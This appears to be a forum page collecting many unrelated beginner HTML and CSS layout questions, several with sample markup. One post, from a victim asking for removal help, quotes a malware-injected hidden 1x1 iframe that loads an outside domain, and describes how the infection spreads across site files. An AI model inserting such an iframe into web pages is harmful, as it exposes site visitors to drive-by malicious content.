HTML - Got To Hate It .. Pff Help With My Screwed Up Template
I'm not really a coder but better at designing the actually template...but I'm always left to coding it anyways... I just need some help smoothing things out because right now it looks terrible in all browsers
Heres what its supposed to look like: it looks a mess in firefox but ok on Internet Explore http://www.sendspace.com/file/v3t00e Thanks if you could help me sort things out Similar TutorialsHi, I am a complete newbie at HTML and web developing so I need a lot of help with this issue. I had to maintain a website and all i had to was update some links in the web pages by editing them to keep them updated. before, everything was working fine, but when i edited one webpage I can no longer see the formatting/ style on the webpage. ok, this webpage is made of a header page, a display page, and a menu page. The menu page contains links to some other webpages and i had to update those links. this is how it used to look before basically by clicking the triangle i could go to the drop down menu and i could choose any chapter and itwould take me to the specific link and this is what i see after i edited the links in ms word now i STILL can go to the updated links BUT i lost the formatting/ style of the menu is there any way of changing that? pelase help Can anyone take a look at the code over he http://healthclub90.com/az342h/health/blahblah.html and tell me whats wrong with the code so that the image of the brown box isn't all screwed up ? Thank you! I have a table here where it says "Additional Info About bundyxc". It's screwed up in both IE and Firefox. Everything is fine about the table, except it's too long on the right site (you can see the green bar doesn't quite span the entire table). The border is just sticking out a little too far, and I don't know how to change this. Any ideas? Ive never really made a massive sight before or anything too complicated so I decided to create a decennt website. I did it all in html with some flash and obviously some images. I created all of the alignment, etc using tables. I loaded it up and was quite happy that it was looking alright and then I loaded it up in Internet Explorer and half my content is missing. My flash doesnt load properly (what is there) and I cant get my head around how a browser change could cause such a difference. Firefox: Internet Explorer: Ive attached the index file incase anyone wanted to have a look at it and can make a bit of sense as to what this problem could be. Thanks in advance for any help. Ok, this is the last thing that I need to do to finish this site and its driving me crazy. Ok, so if you view my site in Firefox everything looks fine http://www.clandestinedesigns.com/ccinsurance/index.php if you view it in IE, the content box and the iframe are not lining up like it does in Firefox. Does anyone know what is causing this? Hi- Is there a way a frame target is screwed up? I have my frameset defined as <frameset rows="30, 83%" cols="1*" border="0"> <frame name="top" scrolling="no" marginwidth="10" marginheight="14" src="top.aspx"> <frameset rows="1*" cols="30%, 70%"> <frame name="left_target" scrolling="auto" marginwidth="10" marginheight="14" noresize src="left_meaning.aspx"> <frame name="right_target" scrolling="yes" marginwidth="10" marginheight="14" src="right_meaning.aspx"> </frameset> </frameset> and insde "right" frame, all <a> links have target to "left." But it load some external java script before so I assume that is where target is screwed up. But if i set hyperlink as follow: <A target="left_target" href="http://www.yahoo.com">aa</a> that the target set here should override whatever that comes before it, shouldn't it? Thanks for your help hi, This might be a wrong place to post this topic. But I am really screwed up by a malware "jL.chura.pl/rc/". May be some of you has faced similar problem. So I am seeking help here. I am getting no proper removal instructions on web for the malware. Symptoms- 1) Modify all .html, .php, .asp files on the PC by inserting a line "<iframe src="http://jL.chUra.pl/rc/" width=1 height=1 frameborder=0></iframe>" at the end of <body> tag. 2) Even if you try to remove it, the same line comes again in the file after colsing the file. 3) When you open the html pages in browser while internet is connected, these webpages try to connect to a website "http:/jL.chura.pl/rc/". May be it try to send some data from PC. 4) Antivirus like Symantec gives warning like "Malicious pdf request found" and block the webpages. 5) Doesnt change the Last modifed date of the file. 6) It works in safe mode also. I searched in all the programs and registry running on my machine. I found nothing. My all html and php webpages has been infected and I am not able to remove the <iframe> tag from any of the file. Do anybody knows the removal and cleaning procedure for this? Can anybody please help me out? I dont want to format my system. Regards, html_jaas Okay, I've got this web page designed by somebody else. I've messed with it a bit over the years and last night I decided I wanted to insert a bunch of icons connecting to another site. I realized it would have to be done with a table and I made one & put it in the appropriate place on the web page! Hooray. But everything After the table has now shifted over to a narrow column on the left hand side. I'm hoping I can send an attachment of the html and somebody can tell me how to get out of whatever is messing up the formatting after the table. Seriously, why does it hate me? The math is all correct and it lays out perfectly fine in firefox as expected. Can anyone give me a tip as to what's wrong here before I trash this whole idea and go with a reliable table. 2 columns. 15px left and right margins on the "left" column, 470px wide 15px right margin on the "right"column, 455px wide Code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Untitled Document</title> <style type="text/css"> body { margin: 0; padding: 0; width: 970px; background: #e1e1e1; } #wrap { padding: 10px 0; background: #fff; } #left { margin: 0 15px; width: 470px; height: 100px; float: left; background: #f00; } #right { margin: 0 15px 0 0; width: 455px; height: 100px; float: right; background: #666; } </style> </head> <body> <div id="wrap"> <div id="right"></div> <div id="left"></div> <div style="clear: both;"></div> </div> </body> </html> Hi I'm tearing my hair out over here just trying to get table cells to be the desired width... I've tried all sorts of different things, but I still can't get the left column in this table to be wider. Ideally I'd like the table to be 50/50 so that the titles are all placed nicely down the left hand side and the form fields are all nicely down the right hand side... simple right? http://www.nickthorn.com/surfersworld/NewUser.asp I'm sure the answer is staring me in the face! Any help greatly appreciated, thanks. Kev Hello all. I have this page showing an image viewer and in internet explorer i have these horrible gaps in it. Can anybody please help me. HTML Code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <style> body {padding: 0px; margin: 0px;} .table_top{ width: 827px; height: 9px; background-image:url(images/top_line.jpg); background-repeat:no-repeat; text-align:center; } .table_content{ width: 827px; background-image:url(images/table_content.jpg); background-repeat:no-repeat; height: 418px; text-align:center; } .table_viewer{ margin-left:15px; margin-right:15px; text-align:center; } .table_thumb2{ margin-left:15px; margin-right:15px; text-align:center; height: 60px; width: 770px; overflow: hidden; position: fixed; } .middle_line{ width: 827px; height: 7px; background-image:url(images/middle_line.jpg); background-repeat:no-repeat; text-align:center; } .table_thumb{ width: 827px; height: 61px; background-image:url(images/table_thumb.jpg); background-repeat:no-repeat; text-align:center; } .table_bottom{ width: 827px; height: 9px; background-image:url(images/bottom_line.jpg); background-repeat:no-repeat; text-align:center; } </style> </head> <body> <div class="container" align="center"> <div class="table_top" align="center"></div> <div class="table_content" align="center"> <span class="table_viewer"> <a href=\"/gallery/slide.php?image=69&auto=on\"><img src='/gallery/images/left_arrow.png' width="52" height="50" border = '0' /></a> <img src="./slides/img001.JPG" title="img001.JPG" align="middle" /> <a href=\"/gallery/slide.php?image=1&auto=on\"><img src='/gallery/images/right_arrow.png' width="52" height="50" border = '0' /></a> </span><br /> </div> <div class="middle_line" align="center"></div> <div class="table_thumb" align="center"> <span class="table_thumb2" align="center"> </span></div> <div class="table_bottom" align="center"></div> </div> </body> </html> Thanks in advance Knappers Hi, I am working on a website: hxxp://www.webjuicer.be When I click on "contact" I've added <a name="top"> tag on that page, that's why the url includes #top. (the browser should automatically scroll down to that tag on the page) Normally, like I've always learnt, this is a basic tag and should work in all browsers. However, it seems that Internet explorer has more difficulties with it. In IE it only works when I press "contact" twice, and therefore it's useless. Any one knows what I've did wrong? Thnx very much! All I want is to have my image placed in the center of my web page... Every code I try doesn't work. The image is either at the top of the page or it doesn't stay in the center at different resolutions. Can someone help me? Hey there. I have a blog. its called reign of uncertainty, and the url is www.confusedforeternity.blogspot.com i am using a zigmag remedy template. i am trying to put links in the bar, where it says "home, about me, art....". but the template automatically prefixes the blog url before the link. if i put www.deviantart.com in the xml code, it automatically becomes http://www.confusedforeternity.blogs...deviantart.com. i am not the good at coding and i dont know why its happening. the xml template is available he http://www.mediafire.com/?tz3mzcgntmt A solution will be appreciated. here is the template. it's coded badly since I used photoshop and dreamweaver since I dont really know how to code. the only thing I need to do is add a div tag in the body thats white and another div tag for the footer with that color. ive been messing with it but i cant get it. i end up messing the whole template up. could someone please help me with those 2 spots please? I'm trying to make a template for e-bay using Dreamweaver. When I use CSS, it applies everything to the whole auction, so even the e-bay things have the font as orange. I went in and changed everything to html and things look better, but I'm having a problem with the border around my images. I would like it to be the color in the background instead of black. Here is a screenshot of what I am talking about. http://s132.photobucket.com/albums/q...screenshot.jpg Here is the code I currently have: <img src="http://i132.photobucket.com/albums/q14/littlestinkerstore/SSTemplate/ssimagej.jpg" width="288" height="288" border="9"></p> <p align="center"> </p> <p align="center"><img src="http://i132.photobucket.com/albums/q14/littlestinkerstore/SSTemplate/ssdescriptionj.jpg" width="450" height="225" border="2"></p> What I would REALLY like is a border around the image that is another image, a pattern used in the background, but I will be happy with a color that matches!! Thanks! I have an older template that has a stylesheet and iframes.html I am wanting to put this into it and just havent had any luck. <!-- MLCALC BEGIN --> <script type="text/javascript"><!-- mlcalc_default_calculator = 'loan'; mlcalc_currency_code = 'usd'; mlcalc_amortization = 'year_nc'; //--></script> <script type="text/javascript" src="http://www.mlcalc.com/jquery.js"></script><div style="font-weight:normal;font-size:9px;font-family:Tahoma;padding:0;margin:0;border:0;background:transparent;color:#E5E5E5;width:300px;text-align:right;padding-right:10px;" id="mlcalcWidgetHolder"><script type="text/javascript" src="http://www.mlcalc.com/widget-wide.js"></script>Powered by <a href="http://www.mlcalc.com/" style="color:#E5E5E5;text-decoration:none">Mortgage Calculator</a></div> <!-- MLCALC END --> I have been able to muddle it into the page but get script error. I am sure I need to provide more information. The tables on the page are just to confusing for me to work this in. Just thought I would start off with the problem. Wasnt sure what forum to put this in either thanks in advance for any input. Hi, total newbie to website design and I need help in getting rid of a template. I think for now all i want is to go to cPanel, then right to a HTML editor, but every choice seems to leave me with some sort of forced template. I just switched from Sitebuilder to RVsitebuilder and was a little happier with the 'build your own' template... but still there is a template. I want to learn to design my own header, not have some preset thing.... Should I just keep messing with different builders? Try wordpress? (it's Not like i can ruin anything, there is no content up yet to worry about overwriting) Hoping someone feels like answering this tonight Hey everyone, First of all, I don't know any HTML, I'll be following a tutorial later this week to learn it, yet I decided to give website lay-outs, a go. Here's what I got so far. Now my questions are, do I have to add the text on there now? Or will I add it with HTML later on? And my other question is, how exactly does the slice tool work? Do I just have to slice it all in pieces? Or do I have to add the URL to it too? (If you double-click a slice you can enter a URL, how can I know the URL if I don't even have a site yet?) Thanks a lot! |